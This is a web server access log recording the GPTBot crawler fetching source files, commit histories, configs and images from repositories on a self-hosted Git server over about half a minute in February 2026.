"https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:14:20:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 153443] [Gzip 15.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:20:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 21524] [Gzip 6.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" -[17/Feb/2026:14:20:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 24868] [Gzip 6.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" -[17/Feb/2026:14:20:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" -[17/Feb/2026:14:20:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/" -[17/Feb/2026:14:20:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" -[17/Feb/2026:14:20:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/" -[17/Feb/2026:14:20:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 11659] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1" -[17/Feb/2026:14:20:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 9903] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/DOCKER_GUIDE.md" -[17/Feb/2026:14:20:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues/new" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" -[17/Feb/2026:14:20:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues/new" -[17/Feb/2026:14:20:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest" -[17/Feb/2026:14:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10487] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" -[17/Feb/2026:14:20:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19492] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build" -[17/Feb/2026:14:20:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html%2fassets" [Client 74.7.227.38] [Length 49423] [Gzip 8.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" -[17/Feb/2026:14:20:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 23749] [Gzip 11.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py" -[17/Feb/2026:14:20:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 32988] [Gzip 11.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" -[17/Feb/2026:14:20:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 13033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" -[17/Feb/2026:14:20:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 9187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py" -[17/Feb/2026:14:20:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 10965] [Gzip 4.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx-reverse-proxy.conf" -[17/Feb/2026:14:20:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx-reverse-proxy.conf" -[17/Feb/2026:14:20:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" -[17/Feb/2026:14:20:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/Project%20Planning-1.md" -[17/Feb/2026:14:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21042] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:20:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11256] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:20:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21645] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:20:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:14:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 626446] [Gzip 15.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main" -[17/Feb/2026:14:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9868] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:20:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9868] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:20:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9868] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9867] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:20:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:20:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 25620] [Gzip 11.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10281] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:20:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 26816] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 427] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:20:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9867] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:14:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9868] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:20:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 15331] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:14:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 11658] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6" -[17/Feb/2026:14:20:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml" [Client 74.7.227.38] [Length 12552] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:14:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21019] [Gzip 6.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:14:20:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11233] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:14:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml" -[17/Feb/2026:14:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml" [Client 74.7.227.38] [Length 12581] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6" -[17/Feb/2026:14:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html" [Client 74.7.227.38] [Length 21807] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" -[17/Feb/2026:14:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images" [Client 74.7.227.38] [Length 10203] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets" -[17/Feb/2026:14:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 